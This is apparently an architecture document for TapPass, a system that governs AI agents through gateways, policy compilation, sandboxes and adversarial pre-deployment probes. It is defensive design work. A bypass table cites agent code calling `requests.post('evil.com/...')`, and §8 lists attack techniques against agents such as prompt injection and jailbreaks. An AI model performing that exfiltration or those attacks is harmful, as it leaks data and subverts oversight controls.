Skip to content

TapPass Governed Agents — Reference Architecture

TapPass Governed Agents — Reference Architecture

Section titled “TapPass Governed Agents — Reference Architecture”

Status: Vision / architecture concept. Central reference for how TapPass governs hosted agents end-to-end. Date: 2026-05-07 Companion to: tappass-gateway-concept.md, intent-to-policy.md, runtime-tool-discovery.md, enforcement-layers-taxonomy.md, projects-teams-concept.md, tappass-strategy-memo-v3.md. This document is the integration story — a question-driven walk through the architecture, building from the market pattern that makes governance load-bearing to a fully operable agent fleet.

Canonical terminology. This document uses the canonical names from the Strategy Memo v3 and the architecture ADRs throughout: 3 rings + 2 cross-cutting layers (ADR 0001), Provider + Runtime (ADR 0002), and Compiled Policy organized by aspect (ADR 0003). For concise definitions, see architecture/concepts/index.md.


Fifteen questions, in order of increasing capability. Each section depends only on the ones above; each adds one piece to the value proposition.

#QuestionAnswer (one line)What this adds
1Why is this needed now?Every vendor is shipping agents; every customer must govern dozens; existing answers (provider-side, mesh, per-vendor) are fragmented.The framing
2How do we see what an agent does?Put TapPass on the request path: gateway + 32-step pipeline + audit. Provider-agnostic by design.Observability
3What interactions do we govern, and against what threats?LLM, tool emissions, MCP both sides, code, harness — covering OWASP LLM Top 10.Coverage of every surface, with a named threat model
4How is policy written, and how do regulations map?Five authoring layers + pre-built compliance packs (EU AI Act, OWASP LLM, GDPR, HIPAA, PCI-DSS).Structured authoring + procurement-defensible compliance
5How do business users actually use this?Function presets + category toggles + preview-with-because; NLP interview vision.60-second onboarding
6How does policy scale across an org with multiple teams?Three-tier cascade: org floor → project floor → agent overrides. Teams gate who authors what.Multi-team operability
7How do we have a known set of tools — including own-written ones?Curated catalog + per-tenant extensions + runtime discovery (default-deny).No surprise tool calls
8How do we know the agent obeys policy before we deploy it?Pre-deployment evaluation harness: 50+ adversarial probes against the policy under test, pass/fail report.Pre-deployment confidence
9How do we enforce policy on the host?Five enforcement positions, organized as 3 rings + 2 cross-cutting layers: harness / kernel / interpreter (in-process); LLM gateway and MCP broker (between processes). Defense in depth.On-machine enforcement
10How do we unify one policy across every position?The Compiled Policy — one Rego source, organized by aspect (network/fs/tools/interpreter/budget/compliance), rendered by per-target providers into native config.One artifact, every chokepoint
11How does the Compiled Policy reach the agent's host?Bootstrap URL + tappass-host init under machine identity.Deployment seam
12How do we keep sandboxes in sync, and detect drift?Signed unidirectional sync push + monotonic version + behavioral baseline alerts.Live propagation + drift detection
13How do we ensure the agent can't grant itself more?Privsep + no upward channel + signed payloads + fail-closed TTLs.Non-escalation
14How do we manage three CLIs without confusion?Three packages, three identities, three audiences — no overlap.Operability
15What does this look like for a real agent?Reference implementations: Collibra (§15.1), support emailer, code reviewer, refund processor (§15.2).Concreteness

About 60% of this architecture already exists in TapPass — the gateway (provider-agnostic), OPA pipeline, OpenShell sandbox, intent-to-policy resolver (live on main today), audit hash-chain. The contribution of this document is the artifact in the middle (the Compiled Policy), the delivery model that keeps it live across a fleet, the org/project/team cascade, the pre-deployment evaluation harness, and the regulatory compliance pack scaffolding.

What it costs to build: ~10–16 engineering weeks for the architectural spine (sized in §14.4), plus ~6–10 weeks for the evaluation harness and compliance packs. Trust posture (SOC 2, data residency) is operational, ~6 months calendar time.


TermDefinition
PolicyA Rego (OPA) rule set authored by an operator. The single source of truth.
PipelineThe 32-step engine that runs on every governed call.
SandboxA logical agent installation: identity + a Runtime instance.
Sandbox-specNamed template binding a Policy + a Runtime; produces sandboxes.
Compiled PolicyCanonical, signed, versioned IR emitted by the OPA cascade. Content organized by aspect (network / filesystem / tools / interpreter / budget / compliance), not by ring. What providers consume. Operational alias: Keyring (file on disk, SDK class). See ADR 0003.
ProviderPer-target plug-in (renderer). Pure function provider(compiled_policy, capabilities) → target_config. Like Terraform providers. See ADR 0002.
RuntimeOperator-authored recipe combining one provider per ring + the LLM Gateway / MCP Broker config. The unit of agent deployment. Sandboxes are bound to runtimes.
RingOne of three in-process enforcement positions: harness, kernel, interpreter.
Cross-cutting layerEnforcement position between processes, always compulsory. Two of them: LLM Gateway (every prompt + response) and MCP Broker (every tool call). See ADR 0001.
Authoring layerOne of five intent-to-policy layers: function → categories → concerns → capabilities → pipeline. Different axis from enforcement positions; see callout below.
Compliance packPre-built bundle of functions/categories/concerns mapped to a regulation (EU AI Act, OWASP LLM, GDPR, …).
Org floorOrg-level policy that applies to every project and agent. Cannot be relaxed below.
Project floorProject-level policy. Cannot be relaxed below the org floor.
Agent overridePer-agent additions on top of the cascade. Cannot relax org or project floor.
TeamThe access-control unit. SSO-group-backed.
Pre-deployment evaluationAdversarial probe suite run against an agent before it ships, producing a pass/fail report against the policy.
Drift signalBehavioral deviation in production from the agent's pre-deployment baseline.
SyncUnidirectional, signed channel from TapPass → tappass-host delivering Compiled Policy updates. Push + pull + reconcile.
OperatorTapPass admin who authors policy and provisions sandboxes.
Host ownerDevOps person owning the machine where agents run. Owns the machine identity sync trusts.
AgentThe agentic application. Read-only consumer of its Compiled Policy. Least-trusted component.
tappassManagement CLI — operator's tool.
tappass-hostRuntime CLI/daemon — runs on the agent's machine. Daemonized variant of tappass exec.
tappass-agentClient SDK + thin debug CLI — read-only.

Two axes named "layer" — read once. Authoring layers (intent-to-policy.md): how policy is written. Enforcement positions (this concept — 3 rings + 2 cross-cutting): where policy is applied. Different axes. The authoring resolver's output is the input to Compiled Policy compilation.


The market pattern. Every vendor is shipping agents. Every customer is about to install dozens. Existing governance answers are fragmented. The result: every agent install becomes a procurement gate, and customer audit work scales linearly with the number of agents.

What this adds: the framing. Why TapPass exists, why the architecture is shaped the way it is.

What still missing: anything actionable. We have to put TapPass on the request path before any of this can happen. §2.

  1. Every SaaS vendor is shipping agents. Collibra is researching agents for catalog management. Salesforce, ServiceNow, Atlassian, GitHub, Notion — all of them are or will be packaging AI agents that act on customer data. The agent is becoming a feature, not a separate product.

  2. Every developer machine runs agentic IDEs. Claude Code, Cursor, Cline, Windsurf. These tools make API calls with personal keys, with filesystem and repo access. Every developer laptop is a potential exfiltration surface.

  3. Most enterprises don't even know how many agents they already have. Shadow agents proliferate before governance arrives — a script with OPENAI_API_KEY, a notebook that calls Anthropic, a Cursor install with autonomous tool access. The operator's first question is "what agents do I already have?" before they can even ask "how do I govern them?"

  4. Every CISO is staring at this and asking "what's our governance story?" The honest answer for most enterprises today is we don't have one.

Within 18 months, this becomes a hard gate. Every agent install will require an answer to:

  • "Show me which agents touched which resources."
  • "Prove they couldn't have touched the others."
  • "Show me what this agent will do before I let it loose on production." (See §8.)
  • "Kill this agent's session if it loops or behaves unexpectedly."
  • "Give me an EU AI Act / SOC 2 / OWASP LLM compliance attestation for this deployment." (See §4.5 and §17.)

Without an answer, every install is a procurement gate. With a fragmented per-vendor answer, the customer's compliance work scales linearly with the number of agents installed — unsustainable.

1.3 Why TapPass, not the obvious alternatives

Section titled “1.3 Why TapPass, not the obvious alternatives”

Three properties no existing vendor offers together:

  • LLM provider agnostic. Same governance applies whether the customer is on OpenAI, Anthropic, Cohere, Mistral, Azure OpenAI, or self-hosted Llama. Locking governance to one provider locks the customer to that provider — which no CISO will accept. TapPass speaks OpenAI-compatible, Anthropic-native, and MCP wire formats, routing to 100+ providers via LiteLLM (§2.1).
  • Vendor neutral. A Collibra agent, a Salesforce agent, and a custom internal agent are all governable from one chokepoint. Per-vendor governance reproduces the problem at meta-level.
  • End-to-end. From the LLM call all the way down to network egress on the agent's host. Anything less leaves a layer where the agent can do something unsanctioned. §3 enumerates the surfaces; §9 the enforcement layers.

The rest of this document is how we deliver them.


The foundation. TapPass sits on the AI request path. Every LLM call and every tool call passes through a 32-step pipeline with hash-chained audit. Provider-agnostic by design. Already shipped as tappass/gateway/.

What this adds: observability of every governed call. PII / secret / exfil detection. Audit. Quotas. Capability tokens. The same plumbing works whether the customer is on OpenAI today or Llama next quarter.

What still missing: governance over tool execution itself, the agent's runtime environment, and what tools it's allowed to call. Subsequent sections close those gaps.

2.1 The proxy primitive (live today, provider-agnostic)

Section titled “2.1 The proxy primitive (live today, provider-agnostic)”
EndpointFormatCompatible clientsProvider routing
POST /v1/chat/completionsOpenAIOpenAI SDK, LangChain, LlamaIndex, Cursor, curlOpenAI, Azure OpenAI, Mistral, Cohere, local models, 80+ via LiteLLM
POST /v1/messagesAnthropicClaude Code, Cline, Anthropic SDKAnthropic, Bedrock Anthropic, Vertex Anthropic
POST /v1/tools/executeTool execTapPass SDK govern() wrapper(provider-independent)
MCP serverMCPClaude Code, agent wrappers, any MCP-aware tool(provider-independent)

One policy engine. One audit log. One vault. Putting TapPass on the path is as cheap as setting ANTHROPIC_BASE_URL=https://api.tappass.ai/v1. The customer does not have to choose a provider before adopting TapPass; they can switch providers later without changing their governance posture.

A 32-step engine runs on every governed call: PII / secret / exfil detectors, capability-token validation, audit signing (ES256 mandates, hash-chained), quota enforcement, response filtering. The intent-to-policy briefing's runtime substrate is exactly this.


3. What interactions do we govern, and against what threats?

Section titled “3. What interactions do we govern, and against what threats?”

Scope: every surface, mapped to a named threat model. Five interaction surfaces, each with its own enforcement primitive at its own layer. Coverage is mapped to OWASP LLM Top 10 so customers have a procurement-defensible threat list.

What this adds: clarity that "governance" means more than LLM proxying — and that we know exactly what threats we defend against (and which we don't, by design).

InteractionWhat we governLayerEnforcement primitive
LLM call (agent → provider)Prompt content, response content, tool emissions in the responsegatewayPipeline detections + capability tokens
Tool execution — outbound (agent → external tool, e.g. Collibra MCP)Which tools, with which args, in which sessionmcp (TapPass MCP proxy)Pipeline steps schema_acl, loop_guard, runtime-tool-discovery check
Tool execution — inbound (external → agent's MCP)What other systems can ask the agent to domcp (TapPass MCP server)Capability tokens (ES256), per-tool constraint engine
Code execution (agent runs Python, shell)Imports, binaries, executor networkcodemodeExecutor profile (Monty-style allow/deny)
Agent-runtime hooks (Claude Code-style settings.json)Pre-tool-use hooks, allow/deny at runtime levelharnessRuntime config file in the sandbox
Host-level activity (filesystem, network, processes)What the agent's process can do at allkernelOpenShell — Landlock + L7 network egress + credential hiding

3.2 Threat coverage — mapped to OWASP LLM Top 10

Section titled “3.2 Threat coverage — mapped to OWASP LLM Top 10”
OWASP LLM threatWhere TapPass catches it
LLM01 Prompt InjectionPipeline detect_prompt_injection (gateway)
LLM02 Insecure Output HandlingPipeline scan_output (gateway); tools_denied capability scoping
LLM03 Training Data PoisoningOut of scope (provider-side concern; mitigated by 0-training policy in §17)
LLM04 Model Denial of ServiceQuotas + loop_guard pipeline step (mcp); rate-limited capability tokens
LLM05 Supply Chain VulnerabilitiesRuntime tool discovery default-deny (§7); denied_imports codemode profile
LLM06 Sensitive Information Disclosuredetect_pii, detect_secrets, scan_output (gateway); kernel egress allowlist
LLM07 Insecure Plugin DesignCapability tokens + per-tool constraint engine (mcp); schema_acl
LLM08 Excessive AgencyCapability tokens (gateway); forbidden_capabilities floor (§4.2); loop_guard (mcp)
LLM09 OverrelianceOut of architectural scope (an application-quality concern; pre-deployment eval flags it — §8)
LLM10 Model TheftEgress allowlist (kernel); rate-limited tokens; audit

Plus TapPass-specific threats not in OWASP LLM:

ThreatWhere TapPass catches it
Loop / runaway agentloop_guard pipeline step + session kill
Tool catalog drift / shadow toolsRuntime tool discovery default-deny + review queue (§7)
Cross-sandbox data leakageSeparate mount namespaces, separate UIDs, separate sync channels (§13)
Agent self-escalationPrivsep + signed sync + no upward channel (§13)
Behavioral drift in productionDrift detection signals (§12.4)

This is the procurement-conversation answer to "what threats does this defend against?"


4. How is policy written, and how do regulations map?

Section titled “4. How is policy written, and how do regulations map?”

Structured authoring + compliance packs. Five authoring layers (intent-to-policy) translate operator intent into pipeline config. Pre-built compliance packs bundle the right functions/categories/concerns to satisfy specific regulations.

What this adds: a way for compliance, product, and engineering to share a vocabulary — and a one-click path to "my deployment satisfies EU AI Act / OWASP LLM Top 10 / GDPR baseline."

What still missing: an experience that a non-engineer can complete in 60 seconds. §5.

LayerQuestionOwned byExample
L0 FunctionWhat is this agent for?Product / Compliancerefund_processor
L1 CategoriesWhat kind of data?UXcustomer_pii, payment_data, eu_residents
L2 ConcernsWhat risks / regulations?Compliancedata_leak, pci_dss, gdpr_required
L3 CapabilitiesWhat can each tool do?Integrationsexternal_messaging, pci_dss_scope
L4 Effective pipeline(computed)Resolverenabled detectors + tool constraints + Rego instances

Plus L5 Manual overlay — operator-specific tweaks that stack on top with strictest-wins merge. The resolver is ~40 lines and produces a normal pipeline config — no added latency on the hot path.

4.2 Forbidden capabilities — the absolute floor

Section titled “4.2 Forbidden capabilities — the absolute floor”

When a function declares forbidden_capabilities: [code_execution, sor_arbitrary_write], no operator override, no manual edit, no exception request can give that agent those capabilities. Lifting them requires editing the function YAML — a separately-audited Compliance action.

4.3 Compliance packs — pre-built regulation bundles

Section titled “4.3 Compliance packs — pre-built regulation bundles”

A compliance pack is a curated bundle of functions, categories, concerns, capabilities, and Rego templates that, when applied to a sandbox-spec, produces a pipeline that satisfies a specific regulation or framework. Operators tick one box; the resolver expands into the right rules.

PackWhat it bundlesApplies toStatus
EU AI Act (high-risk)Concerns: gdpr_required, data_residency, audit_required, human_oversight_required. Categories: eu_residents, customer_pii. Mandatory audit_signing, require_human_approval for high-risk operations. Forbidden: undocumented automated decisions.Any sandbox-specNew (this concept)
OWASP LLM Top 10Concerns covering all 10 OWASP categories (§3.2). Detectors enabled: detect_pii, detect_secrets, detect_prompt_injection, scan_output. loop_guard.Any sandbox-specNew (this concept)
GDPR baselineConcerns: gdpr_required, data_residency: eu. Constraints: external_messaging excludes *.us, *.cn. Right-to-erasure attestation in audit.Any sandbox-specNew
PCI-DSS scopeConcerns: pci_dss, audit_required. Constraints on financial tools (max amounts, approval thresholds).Sandbox-specs handling payment dataNew
HIPAAConcerns: hipaa, data_leak, access_control_strict. PHI-mode detect_pii. Constraints on external_messaging.destination.Sandbox-specs handling health dataNew
NIS2 / DORAConcerns: audit_required, incident_reporting, business_continuity. Mandatory audit retention; alerting hooks.Regulated EU industriesNew

A pack ships as a YAML bundle; applying one is tappass policy apply --pack eu-ai-act. Packs compose — the operator can apply EU AI Act + GDPR baseline + OWASP LLM Top 10 to one sandbox-spec; the resolver merges via strictest-wins.

Why this matters: for an EU buyer (Collibra, regulated industries), the procurement-defensible path is "we tick three boxes, and the deployment is EU AI Act + GDPR + OWASP LLM compliant." Without packs, every customer assembles compliance from scratch. With packs, the same policy is reused across the customer base — and the same policy can be certified once by a third party, with that certification inherited by every deployment that applies it.


5. How do business users actually use this?

Section titled “5. How do business users actually use this?”

60-second onboarding. Function presets do most of the work. Category toggles fill in the rest. Compliance packs add regulatory floors with one click. Preview shows every rule with a "because" trail.

What this adds: the people who own governance decisions can use the system without an engineer.

What still missing: a way for multiple teams to author and scope policy without stepping on each other. §6.

StepQuestionTime
1"What kind of agent is this?" — function picker~10s
2"Anything special about your data?" — categories, pre-ticked from function~20s
3"Any compliance requirements?" — checkboxes for compliance packs (EU AI Act, OWASP LLM, GDPR, …)~10s
4Preview & commit — every line shows its because trail~30s

Every effective rule carries a chain back to the operator action that produced it — including which compliance pack contributed:

detect_pii (block)
⤷ Concern: data_leak
⤷ Category: customer_pii ✓ ticked at onboarding
⤷ Compliance pack: eu-ai-act ✓ ticked at onboarding
⤷ Org floor: ✓ inherited from "acme-baseline"
Function: refund_processor
Set up by: jens@acme.com on 2026-04-25 14:32 UTC

The same resolver runs. The LLM is a typed-selection helper from prose to a small, closed-set decision: which function, which categories, which compliance packs, which capabilities. It never produces Rego, never names a pipeline step. Every output is a typed selection from a closed catalog — no hallucination can write a policy that silently allows something it shouldn't.


6. How does policy scale across an org with multiple teams?

Section titled “6. How does policy scale across an org with multiple teams?”

Three-tier cascade. Org floor → project floor → agent overrides. Strictest-wins merge. Teams gate who authors at which level.

What this adds: the architecture works for an org with 10 teams shipping 50 agents.

What still missing: the catalog of tools the cascade refers to. §7.

ORG FLOOR (the bottom; applies to every project and agent)
│ authored by org admins; cannot be relaxed below
│ typical content: compliance pack(s), forbid PII exfiltration, audit signing
PROJECT FLOOR (per-project additions)
│ authored by project admins; cannot be relaxed below the org floor
│ typical content: project schemas, integrations, tool sets
AGENT OVERRIDES (per-agent specifics)
authored by agent owners; cannot relax org or project floors
typical content: typical-session shape, per-tool constraints, exceptions

Strictest-wins merge: enabled: true always wins, block > notify > log, numeric ceilings (lower wins), contains (union — logical AND).

A team is the membership primitive (see projects-teams-concept.md). SSO-group-backed.

RoleOrg levelProject levelAgent level
Org adminAuthor org floor, manage providers, MCP registryInherits project rightsInherits agent rights
Project adminAuthor project floor, manage agentsInherits agent rights
Agent ownerAuthor agent overrides, provision sandboxes, view this agent's audit
AuditorView org-wide auditView project auditView agent audit (read-only)

6.3 How the cascade interacts with the Compiled Policy

Section titled “6.3 How the cascade interacts with the Compiled Policy”

The policy compiler merges org + project + agent policy before producing the Compiled Policy. The runtime sees one merged effective pipeline. The because-trail records which level introduced each rule.


7. How do we have a known set of tools — including own-written ones?

Section titled “7. How do we have a known set of tools — including own-written ones?”

Catalog + discovery + per-tenant extensions. Curated library + operator-extensible additions + default-deny review queue for everything else.

What this adds: the agent can never call a tool TapPass hasn't seen. Vendor SaaS, internal MCP server, custom Python — all the same.

What still missing: before the agent ships, how do we know the policy actually constrains it as expected? §8.

Each tool has capabilities (external_messaging, code_execution, pci_dss_scope) and slot bindings (destination_param, content_param, amount_param). Concerns target capabilities; the catalog binds capabilities to concrete tools. So "GDPR requires external_messaging.destination excludes *.us, *.cn" applies automatically to every tool with external_messaging.

7.2 Runtime tool discovery (default-deny + review queue)

Section titled “7.2 Runtime tool discovery (default-deny + review queue)”

Every unknown tool the agent emits is captured as a discovered row, blocked at runtime, surfaced in /app/catalog/discovered. Operator approves / refines / denies. Auto-approval lanes (e.g., tools advertised by a registered MCP server) are opt-in.

  • Outbound (agent → external MCP): TapPass MCP proxy forwards after pipeline checks. Credentials stay in TapPass vault.
  • Inbound (external → agent's MCP): TapPass MCP server governs every invocation with capability tokens.

7.4 Own-written tools and internal MCP servers

Section titled “7.4 Own-written tools and internal MCP servers”

The curated catalog covers ~30 well-known SaaS integrations. Customers extend three ways without forking:

Pattern A — add a brand-new tool. Per-tenant tools.yaml:

tools:
acme_dispatch_email:
capabilities: [external_messaging]
slots: { destination_param: recipient, content_param: payload }

Pattern B — extend a known tool. "Our Slack is internal-only; reclassify."

tools:
acme_internal_slack:
extends: slack.send_message
capabilities: [-external_messaging, +internal_messaging]

Pattern C — per-agent override. Tighten classification for one agent.

Internal MCP servers. tappass mcp register --name acme-internal --url https://mcp.acme.local --auth bearer:vault://acme-mcp. Tools advertised by registered MCPs can be auto-approved; credentials stay in TapPass vault.

Custom Python functions. LangChain @tool decorators are discovered via runtime discovery — same loop, same audit boundary.

The catalog is the universe; everything outside is default-deny.


8. How do we know the agent obeys policy before we deploy it?

Section titled “8. How do we know the agent obeys policy before we deploy it?”

Pre-deployment evaluation harness. Run 50+ adversarial probes against the agent under the policy under test. Produce a quantitative pass/fail report. Gate the release on it.

What this adds: the answer to "is my agent safe to ship?" — without this, the policy author hopes the policy holds; with this, they know. This is the procurement question every CISO asks (and what Giskard centers on).

What still missing: runtime enforcement once the agent does ship. §9.

inputs:
• the agent (its tappass-agent SDK + its tasks)
• the candidate policy (function + categories + compliance packs + cascade)
• a probe suite (TapPass-curated; per-pack extensions)
run:
• spin up an ephemeral sandbox with the candidate Compiled Policy
• execute each probe against the agent
• collect: did the agent emit denied tool calls? did detections fire? did
loop_guard trigger? did the agent leak PII / secrets? did it follow
prompt-injection bait? did it over-refuse legitimate prompts?
output:
• per-probe pass/fail with replay
• aggregate score against each compliance pack
• regression delta vs. prior agent version
• recommended policy refinements (e.g., "consider denying tool X — agent
emitted it in 12% of probes for category Y")

Probes are organized by category — same buckets as the OWASP LLM Top 10 mapping in §3.2:

Probe categoryExamplesWhat it tests
Prompt injectionSycophancy, system-prompt extraction, role-confusiongateway pipeline detections + cap-token enforcement
Data disclosurePII extraction probes, secret-leak promptsdetect_pii, detect_secrets + scan_output
Excessive agency"Delete everything tagged tmp", recursive tool-call patternsloop_guard, capability scoping
Over-refusalLegitimate prompts the agent should servecatches policy that's too tight
Hallucination probesDomain-specific factual checksquality gate (out of governance scope but reported)
Jailbreak / obfuscationEncoded prompts, adversarial unicodegateway pipeline detections
Tool misuseCross-schema args, parameter manipulationschema_acl, runtime-tool-discovery
Compliance-specificEU AI Act, GDPR, PCI-DSS, HIPAA probesper-pack assertions

Probe suites are per-compliance-pack — so applying the EU AI Act pack also enrolls the agent in the EU AI Act probe suite. Custom probes can be added per-tenant.

Operator authors policy (§4)
Operator scaffolds agent repo (§7) — agent code uses tappass-agent SDK
Pre-deployment evaluation (§8) — runs against candidate policy
│ ├── pass → proceed
│ └── fail → refine policy or fix agent; re-run
Operator runs `tappass sandbox-spec emit-bootstrap` (§11)
Host owner runs `tappass-host init/start` (§11)
Runtime governance + audit + drift detection (§9–§12)

The harness consumes the same tappass-agent SDK and the same Compiled Policy compilation as production — there is no divergence between "what we tested" and "what we deployed." Probe results land in audit; the dashboard shows "this agent passed evaluation v17 against policy_version 23."

The evaluation harness is callable from CI:

tappass eval run --agent collibra-agent --policy policies/collibra-steward.rego \
--packs eu-ai-act,owasp-llm \
--probe-suite v2026.05 \
--gate fail-on=critical

Returns non-zero on critical failures; designed to gate a GitHub Action / GitLab CI pipeline before agent deployment. Output is a JUnit-style XML report plus a TapPass-native trace bundle for replay.

  • Is: a security and policy-conformance harness — does the agent obey the policy under adversarial conditions?
  • Isn't: a quality / hallucination evaluator beyond what's needed to test policy conformance. Hallucination quality benchmarks belong elsewhere; what this harness checks is whether hallucinations cross policy boundaries (e.g., hallucinating a denied tool name).

9. How do we enforce policy on the agent's machine?

Section titled “9. How do we enforce policy on the agent's machine?”

Five enforcement positions, defense in depth: 3 rings + 2 cross-cutting layers (ADR 0001). Even if the LLM is compromised, even if the agent's runtime is patched, the kernel still blocks it; even if the kernel is bypassed, the gateway still sees every model call.

What this adds: governance over the agent's whole environment. The agent's process is the least-trusted component and is contained accordingly.

What still missing: a way to apply policy uniformly across all five positions from one source. §10.

Three rings sit inside the agent's process — different from each other in what they enforce, the same in that they all depend on the agent's surrounding sandbox:

PositionTypeWhat it isolatesPrimitiveStatus
Ring 1 — HarnessIn-process · cooperativeRuntime config (allow/deny tool calls, hooks)settings.json-style filesNew
Ring 2 — KernelIn-process · compulsoryProcess / network / FS / credentialsOpenShell + nono + inference.localBuilt (tappass/sandbox/)
Ring 3 — InterpreterIn-process · narrowCode the agent writes (codemode)OpenShell + Monty profilesPartial

Two cross-cutting layers sit between processes — always compulsory, always reachable, no runtime-specific cooperation needed:

PositionWhat it isolatesPrimitiveStatus
LLM GatewayEvery prompt + completiontappass/gateway/ (Anthropic-native, OpenAI-compat, LiteLLM 100+ providers)Built
MCP BrokerEvery tool call (outbound + inbound)tappass/gateway/mcp_server.py + per-org MCP registry; schema_acl + loop_guardPartial (broker mode is new)
Bypass attemptPosition that catches it
LLM hallucinates delete_pii_archiveLLM Gateway — capability token rejects emission
LLM emits something the gateway missedMCP Broker — pipeline rejects on tool args
Agent code tries requests.post("evil.com/...")Interpreter ring (denied import) and Kernel ring (egress denied)
Operator runs the agent without a harness profileHarness ring — runtime refuses to start under enforced policies
Operator patches the harnessKernel ring — egress allowlist still blocks

Pitch: we don't trust the agent to call us correctly — we make it physically impossible to call anyone else.


10. How do we unify one policy across every enforcement position?

Section titled “10. How do we unify one policy across every enforcement position?”

The Compiled Policy. One Rego policy authored in §4, merged across the cascade in §6, organized by aspect (network / filesystem / tools / interpreter / budget / compliance) per ADR 0003. Each provider per target consumes the aspects it needs and renders them as native config — defense in depth across rings + cross-cutting layers without duplication in the IR.

What this adds: the operator changes one Rego rule and every enforcement position updates.

What still missing: a way for the Compiled Policy to actually reach the agent's machine. §11.

The Compiled Policy is content-organized by aspect, not by ring. The same aspect can be enforced at multiple positions; the providers selected by the Runtime decide where:

Compiled Policy (provisioned by `tappass sandbox-spec emit-bootstrap`):
identity: sandbox_id, runtime_id, policy_version, sync_url, signing
network: allow_domains, deny_categories
filesystem: workspace, read_only, deny_paths
tools: allow, deny, schemas_acl
interpreter: host_functions, memory_mb, cpu_time_ms, stack_depth
budget: tokens_per_day, dollars_per_month, tool_calls_per_minute
compliance_tags: [SOC2:CC6.1, ISO42001:6.2.3, ...]

Providers per target select which aspects they consume and how to render them:

  • Harness ring (claude-code provider)tools.allow/deny + network.allow_domains → managed settings.json
  • Kernel ring (openshell provider)network.* + filesystem.* → OpenShell YAML profile
  • Kernel ring (nono provider)network.* + filesystem.*nono run flags
  • Interpreter ring (monty provider)interpreter.* → host-function manifest + limits
  • LLM Gatewaytools.allow/deny + network.allow_domains + budget.* → capability tokens
  • MCP Brokertools.allow/deny + compliance_tags → per-call schema ACLs

Three properties: derived not authored, by-aspect not by-ring, live not static.

10.2 The chain from authoring to Compiled Policy

Section titled “10.2 The chain from authoring to Compiled Policy”
Operator picks function + categories + compliance packs (live today)
Authoring resolver runs (~40 lines)
Pipeline config saved (effective pipeline)
▼ merge with org floor + project floor (cascade, §6)
Operator runs `tappass sandbox-spec create` (NEW)
Policy compiler reads merged pipeline + sandbox-spec → emits Compiled Policy (by aspect)
Compiled Policy saved server-side; bootstrap URL minted on demand

11. How does the Compiled Policy reach the agent's host?

Section titled “11. How does the Compiled Policy reach the agent's host?”

Bootstrap URL + tappass-host init. Operator mints a single-use URL. Host owner runs tappass-host init on the target machine. Bootstrap is exchanged under the host's identity.

What this adds: a real deployment seam.

What still missing: a way for the Compiled Policy to stay current as policy changes. §12.

Flow A — multi-sandbox laptop simulation: tappass dev seed-sandboxes --count 3 --policy customer-support; docker-compose up.

Flow B — single-machine install:

# Operator:
tappass sandbox-spec emit-bootstrap customer-support --count 1
# → https://app.tappass.ai/install/abc123
# Host owner:
pipx install tappass-host tappass-agent <agent-package>
tappass-host init my-agent --enroll-url https://app.tappass.ai/install/abc123
tappass-host start my-agent --agent <agent-package>
# Sending prompts:
tappass-host shell my-agent
$ <agent-cli> run-task <task-name>

Is: single-use, 15-min-TTL signed URL. Embeds the sandbox identity, TapPass's signing public key, and a one-shot exchange token. Isn't: a long-lived credential — the exchange happens in the first minute; afterward only the resulting machine identity (mTLS cert) and the Compiled Policy file (keyring.json on disk) remain. The bootstrap URL is burned.

Section titled “11.3 Agent discovery (lightweight, related)”

For customers who don't yet know what agents they have, TapPass surfaces unenrolled agents in two passive ways:

  • Gateway-side detection: an LLM call hits api.tappass.ai/v1 with a token that doesn't map to any active sandbox → the dashboard logs a "potential unenrolled agent" event with source IP, user-agent, and call signature.
  • MCP-side detection: an MCP connection attempt to mcp.tappass.ai with no valid mcp_session_token → same surfacing.

Operator opens Discovered agents in the dashboard, sees a list of "things calling TapPass without enrollment," and one-clicks enroll this to mint a bootstrap URL targeted at the source. Detail mechanism is a separate concept; this concept just commits to surfacing the signal.


12. How do we keep sandboxes in sync, and detect drift?

Section titled “12. How do we keep sandboxes in sync, and detect drift?”

Signed unidirectional sync push + behavioral baseline alerts. Operator changes policy; TapPass re-compiles stale Compiled Policies; signed payloads pushed; host applies; agent observes. Plus: the dashboard learns the agent's baseline behavior and alerts when production diverges.

What this adds: live propagation and a way to know when the agent's runtime behavior drifts from what the pre-deployment evaluation (§8) established.

What still missing: the proof that the same channel can't be abused upward. §13.

[Operator changes policy at any cascade level]
[TapPass re-merges cascade + re-compiles every stale Compiled Policy]
├──▶ updates Compiled Policy rows server-side
├──▶ revokes old gateway_token / mcp_session_token if scope narrowed
└──▶ pushes signed payload over sync_url
[tappass-host validates signature + monotonic policy_version,
atomic-renames `keyring.json` file, applies provider changes]
[Agent observes via inotify; tappass-agent rebinds clients]

12.2 Signed, monotonic, replay-resistant payload

Section titled “12.2 Signed, monotonic, replay-resistant payload”
{
"sandbox_id": "sbx_a1b2c3",
"policy_version": 17,
"issued_at": "2026-05-07T10:00:00Z",
"expires_at": "2026-05-07T10:05:00Z",
"compiled_policy": { network: {…}, filesystem: {…}, tools: {…}, interpreter: {…}, budget: {…}, compliance_tags: […] },
"signature": "ed25519:<TapPass key>:<sig>"
}

Host validates: signature, monotonic version, sandbox match, freshness.

TokenTTLRenewed by
gateway_token5 minsync push
mcp_session_token5 minsync push
Host mTLS cert1 hourtappass-host re-auth
Bootstrap URL15 min, single-use(burned on consumption)

If sync stops working, every capability token expires within minutes and the agent stops being able to act. Fail closed.

12.4 Drift detection — production signals

Section titled “12.4 Drift detection — production signals”

The pre-deployment evaluation (§8) establishes the agent's baseline behavior: which tools it uses, in what frequencies, with what argument shapes, with what session lengths. The runtime emits these as audit metrics. The dashboard learns the baseline and alerts on drift.

Drift signalWhat it catches
Tool-call distribution shiftAgent suddenly calls delete_* 10× more than baseline
Argument-shape driftArgs that don't match pre-deployment patterns (e.g., new schemas, new asset types)
Session-length anomaliesSessions that run far longer than typical
Detection-rate spikesdetect_pii or detect_secrets firing more than baseline — possibly a prompt-injection campaign
Unenrolled-tool discovery rateSurge in discovered rows = agent reaching for tools it hasn't before
Cross-sandbox correlationSame drift signal across multiple sandboxes = upstream change (LLM provider behavior shift, new prompt template)

Each signal raises a dashboard alert with: which baseline metric, current vs. expected, audit replay link, recommended action (re-evaluate? tighten policy? approve as new normal?).

This closes the loop with §8: pre-deployment establishes the policy; runtime drift detection notices when reality diverges from what the policy was tested against.


13. How do we ensure the agent can't grant itself more?

Section titled “13. How do we ensure the agent can't grant itself more?”

Privilege separation + no upward channel + signed payloads + fail-closed TTLs. Four properties, foundation first. The agent is the least-trusted component; the architecture treats it as such.

What this adds: the safety property that makes "live policy" usable. Without this, the same channel that delivers updates would be a vector for the agent to influence its own Compiled Policy.

What still missing: a way to actually operate this — three CLIs, three audiences, no overlap. §14.

